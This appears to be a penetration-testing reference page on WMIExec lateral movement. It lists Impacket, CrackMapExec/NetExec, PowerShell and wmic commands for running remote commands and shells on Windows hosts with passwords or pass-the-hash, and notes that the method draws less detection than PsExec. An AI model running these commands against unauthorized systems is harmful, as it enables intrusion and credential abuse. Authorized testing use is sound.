> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# WMIExec

> WMIExec lateral movement: Impacket WMI execution for semi-interactive shells and command execution.

## Impacket — wmiexec

```bash theme={"dark"}
impacket-wmiexec DOMAIN/user:password@TARGET
impacket-wmiexec DOMAIN/user@TARGET -hashes :NTLM_HASH
```

Semi-interactive shell. Runs as user (not SYSTEM).

***

## Execute Single Command

```bash theme={"dark"}
impacket-wmiexec DOMAIN/user:password@TARGET "whoami"
impacket-wmiexec DOMAIN/user:password@TARGET "ipconfig /all"
```

***

## CrackMapExec (WMI)

CrackMapExec has no `wmi` protocol. Run the command over `smb` with the wmiexec exec method, or use NetExec's native `wmi` protocol.

```bash theme={"dark"}
# CrackMapExec — SMB protocol, WMI exec method
crackmapexec smb TARGET -u user -p password -x "whoami" --exec-method wmiexec

# NetExec — native WMI protocol
nxc wmi TARGET -u user -p password -x whoami
```

***

## PowerShell (From Windows)

```powershell theme={"dark"}
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred
```

### wmic

```cmd theme={"dark"}
wmic /node:TARGET /user:DOMAIN\user /password:password process call create "cmd /c whoami > C:\temp\out.txt"
```

***

## Advantages

* No binary uploaded to target
* Uses WMI (port 135 + dynamic)
* Less detection than PsExec
* No service creation

## Limitations

* Semi-interactive (not fully interactive)
* Output via SMB share (needs ADMIN\$ access)
* Runs as calling user, not SYSTEM

***

## Quick Reference

| Task       | Command                                             |
| ---------- | --------------------------------------------------- |
| Shell      | `impacket-wmiexec DOMAIN/user:pass@TARGET`          |
| PtH        | `impacket-wmiexec DOMAIN/user@TARGET -hashes :HASH` |
| Single cmd | `impacket-wmiexec DOMAIN/user:pass@TARGET "whoami"` |
| wmic       | `wmic /node:TARGET process call create "cmd"`       |
